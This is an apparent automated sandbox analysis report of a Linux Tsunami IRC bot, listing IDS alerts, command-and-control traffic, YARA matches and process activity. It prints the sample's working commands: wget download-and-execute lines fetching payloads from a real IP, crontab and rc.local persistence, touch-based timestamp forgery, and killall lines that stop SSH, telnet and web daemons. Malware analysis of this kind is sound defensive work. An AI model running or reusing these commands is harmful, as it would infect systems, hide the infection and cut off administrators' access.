Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 172.16.6.2: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 216.152.164.133: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 200.24.34.47: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 10.105.4.6: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 217.69.16.46: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.244.122.50: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.219.9.167: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.14.244.66: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 200.24.33.132: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 154.14.144.222: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.206.33.188: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 174.128.37.170: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.16.10.118: -> 192.168.2.20:
Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 162.248.148.205: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.84.30.144: -> 192.168.2.20:
Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 162.221.238.40: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 190.80.3.230: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 162.216.242.252: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 162.17.129.195: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 162.245.108.229: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 213.140.39.117: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 199.27.180.9: -> 192.168.2.20:
Uses IRC for communication with a C&CShow sources
Source: unknownIRC traffic detected: 192.168.2.20:40072 -> 103.3.46.2:8080 NICK x86|x|0|358587|ubuntu-a USER x00 localhost localhost :2021g
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: IRC traffic on port 40072 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 40072 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 34162 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 34162 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 40072 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 43638 -> 8080
Source: unknownNetwork traffic detected: IRC traffic on port 43638 -> 8080
Source: global trafficTCP traffic: 192.168.2.20:58902 -> 211.103.199.94:8080
Source: global trafficTCP traffic: 192.168.2.20:40072 -> 103.3.46.2:8080
Source: global trafficTCP traffic: 192.168.2.20:34162 -> 83.69.77.2:8080
Source: global trafficTCP traffic: 192.168.2.20:43638 -> 66.178.182.1:8080
Source: /bin/sh (PID: 4585)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty0 -O /var/run/tty0
Source: /bin/sh (PID: 4606)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty1 -O /var/run/tty1
Source: /bin/sh (PID: 4638)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty2 -O /var/run/tty2
Source: /bin/sh (PID: 4670)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty3 -O /var/run/tty3
Source: /bin/sh (PID: 4702)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty4 -O /var/run/tty4
Source: /bin/sh (PID: 4734)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty5 -O /var/run/tty5
Source: /bin/sh (PID: 4766)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty6 -O /var/run/tty6
Source: /bin/sh (PID: 4798)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O pty
Source: /bin/sh (PID: 4830)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq0 -O irq0
Source: /bin/sh (PID: 5283)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq1 -O irq1
Source: /bin/sh (PID: 5979)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq2 -O irq2
Source: /bin/sh (PID: 6393)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/tmp/pty
Source: /bin/sh (PID: 6713)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/run/pty
Source: ./pty (PID: 4831)Socket: 127.0.0.1::63008
Source: ./irq0 (PID: 5282)Socket: 127.0.0.1::42076
Source: ./irq1 (PID: 5978)Socket: 127.0.0.1::42071
Source: /usr/sbin/sshd (PID: 6376)Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 6376)Socket: [::]::22
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
Source: global trafficHTTP traffic detected: GET /.x/tty0 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/tty1 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/tty2 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/tty3 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/tty4 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/tty5 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/tty6 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/pty HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/irq0 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/irq1 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/irq2 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/pty HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /.x/pty HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/irq0
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/irq1
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/irq2
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/pty
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty0
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty1
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty2
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty3
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty4
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty5
Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty6

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 6712.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
Source: 6729.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
Source: 5334.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
Source: 8335.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
Source: 4829.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 700 /var/run/tty0 ; /var/run/tty0 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 700 /var/run/tty1 ; /var/run/tty1 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty2 -O /var/run/tty2 ; chmod +x /var/run/tty2 ; chmod 700 /var/run/tty2 ; /var/run/tty2 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty3 -O /var/run/tty3 ; chmod +x /var/run/tty3 ; chmod 700 /var/run/tty3 ; /var/run/tty3 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty4 -O /var/run/tty4 ; chmod +x /var/run/tty4 ; chmod 700 /var/run/tty4 ; /var/run/tty4 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty5 -O /var/run/tty5 ; chmod +x /var/run/tty5 ; chmod 700 /var/run/tty5 ; /var/run/tty5 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty6 -O /var/run/tty6 ; chmod +x /var/run/tty6 ; chmod 700 /var/run/tty6 ; /var/run/tty6 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/pty -O pty ; chmod +x pty ; chmod 700 pty ; ./pty &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/irq0 -O irq0 ; chmod +x irq0 ; chmod 700 irq0 ; ./irq0 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/irq1 -O irq1 ; chmod +x irq1 ; chmod 700 irq1 ; ./irq1 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/irq2 -O irq2 ; chmod +x irq2 ; chmod 700 irq2 ; ./irq2 &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/pty -O /var/tmp/pty ; chmod +x /var/tmp/pty ; chmod 700 /var/tmp/pty ; /var/tmp/pty &
Source: Initial samplePotential command found: wget http://71.127.148.69/.x/pty -O /var/run/pty ; chmod +x /var/run/pty ; chmod 700 /var/run/pty ; /var/run/pty &
Source: Initial samplePotential command found: rm -rf /var/run/1sh
Source: /usr/bin/killall (PID: 5921)SIGKILL sent: pid: 1339, result: successful
Source: 6712.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
Source: 6729.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
Source: 5334.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
Source: 8335.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
Source: 4829.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
Source: classification engineClassification label: mal100.troj.evad.linSH@0/32@0/0

Persistence and Installation Behavior:

barindex
Executes the "crontab" command typically for achieving persistenceShow sources
Source: /bin/sh (PID: 5149)Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5209)Crontab executable: /usr/bin/crontab -> crontab /var/run/.x001804289383
Source: /bin/sh (PID: 5326)Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 5414)Crontab executable: /usr/bin/crontab -> crontab /var/run/.x00740882966
Source: /bin/sh (PID: 6118)Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/sh (PID: 6170)Crontab executable: /usr/bin/crontab -> crontab /var/run/.x00740882966
Explicitly modifies time stamps using the "touch" commandShow sources
Source: /bin/sh (PID: 5108)Touch executable uses timestamp modification options: touch -acmr /bin/ls /tmp/pty
Source: /bin/sh (PID: 5322)Touch executable uses timestamp modification options: touch -acmr /bin/ls /tmp/irq0
Source: /bin/sh (PID: 5514)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab
Source: /bin/sh (PID: 6098)Touch executable uses timestamp modification options: touch -acmr /bin/ls /tmp/irq1
Source: /bin/sh (PID: 6303)Touch executable uses timestamp modification options: touch -acmr /bin/ls /etc/inittab
Sample tries to persist itself using System V runlevelsShow sources
Source: ./irq0 (PID: 5282)File: /etc/rc.localJump to behavior
Source: ./irq1 (PID: 5978)File: /etc/rc.local
Sample tries to persist itself using cronShow sources
Source: /usr/bin/crontab (PID: 5209)File: /var/spool/cron/crontabs/tmp.NIHyLbJump to behavior
Source: /usr/bin/crontab (PID: 5414)File: /var/spool/cron/crontabs/tmp.eaL8KXJump to behavior
Source: /usr/bin/crontab (PID: 6170)File: /var/spool/cron/crontabs/tmp.U4426K
Terminates several processes with shell command 'killall'Show sources
Source: /bin/sh (PID: 4903)Killall command executed: killall -9 arm
Source: /bin/sh (PID: 4906)Killall command executed: killall -9 mips
Source: /bin/sh (PID: 4933)Killall command executed: killall -9 mipsel
Source: /bin/sh (PID: 4960)Killall command executed: killall -9 powerpc
Source: /bin/sh (PID: 4989)Killall command executed: killall -9 ppc
Source: /bin/sh (PID: 5001)Killall command executed: killall -9 daemon.armv4l.mod
Source: /bin/sh (PID: 5029)Killall command executed: killall -9 daemon.i686.mod
Source: /bin/sh (PID: 5036)Killall command executed: killall -9 daemon.mips.mod
Source: /bin/sh (PID: 5045)Killall command executed: killall -9 daemon.mipsel.mod
Source: /bin/sh (PID: 8340)Killall command executed: killall -9 sshd dropbear
Source: /bin/sh (PID: 5628)Killall command executed: killall -9 mini_httpd
Source: /bin/sh (PID: 5667)Killall command executed: killall -9 minihttpd
Source: /bin/sh (PID: 5756)Killall command executed: killall -9 httpd
Source: /bin/sh (PID: 5838)Killall command executed: killall -9 telnetd
Source: /bin/sh (PID: 5857)Killall command executed: killall -9 utelnetd
Source: /bin/sh (PID: 5865)Killall command executed: killall -9 dropbear
Source: /bin/sh (PID: 5921)Killall command executed: killall -9 sshd
Source: /bin/sh (PID: 5966)Killall command executed: killall -9 lighttpd
Source: /bin/sh (PID: 8406)Killall command executed: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
Source: /bin/sh (PID: 7235)Killall command executed: killall -9 mini_httpd
Source: /bin/sh (PID: 7261)Killall command executed: killall -9 minihttpd
Source: /bin/sh (PID: 7358)Killall command executed: killall -9 httpd
Source: /bin/sh (PID: 7432)Killall command executed: killall -9 telnetd
Source: /bin/sh (PID: 7491)Killall command executed: killall -9 utelnetd
Source: /bin/sh (PID: 7510)Killall command executed: killall -9 dropbear
Source: /bin/sh (PID: 7526)Killall command executed: killall -9 sshd
Source: /bin/sh (PID: 7546)Killall command executed: killall -9 lighttpd
Source: /bin/sh (PID: 8462)Killall command executed: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
Writes identical ELF files to multiple locationsShow sources
Source: /usr/bin/wget (PID: 4798)File with SHA-256 862251C20985485D58333FBE31792E09C4CEDE7E157BD39D78EA4BA60756C99F written: /tmp/ptyJump to dropped file
Source: /usr/bin/wget (PID: 6393)File with SHA-256 862251C20985485D58333FBE31792E09C4CEDE7E157BD39D78EA4BA60756C99F written: /var/tmp/ptyJump to dropped file
Source: /usr/bin/wget (PID: 6713)File with SHA-256 862251C20985485D58333FBE31792E09C4CEDE7E157BD39D78EA4BA60756C99F written: /run/ptyJump to dropped file
Source: /usr/bin/killall (PID: 8406)File opened: /proc/230/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/231/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/232/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/233/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/234/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3512/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/359/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/1452/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3632/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3518/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/10/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/11/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/12/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/13/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/14/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/15/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/16/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/17/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/18/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/19/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/483/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3527/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3527/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/1/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/2/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3525/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/1346/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3524/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3524/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/4/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3523/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/5/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/7/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/8/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/9/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/20/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/21/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/22/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/23/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/24/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/25/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/28/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/29/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/1363/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3541/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3541/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/1362/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/496/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/496/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/30/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/31/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/31/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/1119/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3790/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3791/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3310/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3431/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3431/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/260/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/263/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/264/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/385/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/144/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/386/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/145/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/146/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3546/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3546/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/147/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3303/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3545/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/148/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/149/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3543/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/822/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/822/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3308/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3308/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3429/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3429/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/47/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/48/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/48/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/49/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/150/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/271/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/151/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/152/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/153/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/395/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/396/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/154/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/155/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/156/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/1017/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/157/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/158/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/159/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3432/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3432/cmdline
Source: /usr/bin/killall (PID: 8406)File opened: /proc/50/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/51/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/3678/stat
Source: /usr/bin/killall (PID: 8406)File opened: /proc/52/stat
Source: ./pty (PID: 4832)Shell command executed: sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
Source: ./pty (PID: 4834)Shell command executed: sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
Source: ./pty (PID: 4884)Shell command executed: sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
Source: ./pty (PID: 4902)Shell command executed: sh -c "killall -9 arm > /dev/null 2>&1 &"
Source: ./pty (PID: 4904)Shell command executed: sh -c "killall -9 mips > /dev/null 2>&1 &"
Source: ./pty (PID: 4909)Shell command executed: sh -c "killall -9 mipsel > /dev/null 2>&1 &"
Source: ./pty (PID: 4936)Shell command executed: sh -c "killall -9 powerpc > /dev/null 2>&1 &"
Source: ./pty (PID: 4961)Shell command executed: sh -c "killall -9 ppc > /dev/null 2>&1 &"
Source: ./pty (PID: 4993)Shell command executed: sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
Source: ./pty (PID: 5004)Shell command executed: sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
Source: ./pty (PID: 5033)Shell command executed: sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
Source: ./pty (PID: 5038)Shell command executed: sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
Source: ./pty (PID: 5049)Shell command executed: sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
Source: ./pty (PID: 5068)Shell command executed: sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &"
Source: ./pty (PID: 5082)Shell command executed: sh -c "chmod 700 /tmp/pty > /dev/null 2>&1 &"
Source: ./pty (PID: 5098)Shell command executed: sh -c "touch -acmr /bin/ls /tmp/pty"
Source: ./pty (PID: 5125)Shell command executed: sh -c "(crontab -l | grep -v \"/tmp/pty\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1"
Source: ./pty (PID: 5199)Shell command executed: sh -c "echo \"* * * * * /tmp/pty > /dev/null 2>&1 &\" >> /var/run/.x001804289383"
